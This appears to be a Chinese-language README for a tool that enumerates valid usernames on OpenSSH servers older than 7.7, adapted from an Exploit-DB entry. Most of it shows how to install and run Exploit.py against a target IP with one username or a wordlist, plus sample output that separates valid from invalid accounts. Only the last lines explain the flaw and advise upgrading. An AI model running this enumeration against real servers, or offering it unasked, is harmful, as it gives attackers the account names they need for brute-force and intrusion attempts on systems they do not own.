SSH-用户名-枚举-漏洞利用(OpenSSH 2.3 < 7.7)
原始漏洞利用的编辑版本:https://www.exploit-db.com/exploits/45233
#安装依赖:
foo@bar:~$ pip3 install -r requirements.txt
#针对单个用户名:
foo@bar:~$ ./Exploit.py 192.168.1.20 -u root
[+] root 是一个有效用户名
#针对多个用户名:
foo@bar:~$ ./Exploit.py 192.168.1.20 -w username.txt
[+] root 是一个有效用户名
[-] mysql 是一个无效用户名
[-] mike 是一个无效用户名
[-] foo 是一个无效用户名
[-] bar 是一个无效用户名
有效用户:
root
#更多选项:
foo@bar:~$ ./Exploit.py -h
系统对有效和无效的认证尝试会做出不同响应。远程用户可发送特制请求以确定目标系统上的有效用户名。因此,远程用户能够确定目标系统上的有效用户名。
应将 OpenSSH 服务器升级到 7.7 或更高版本。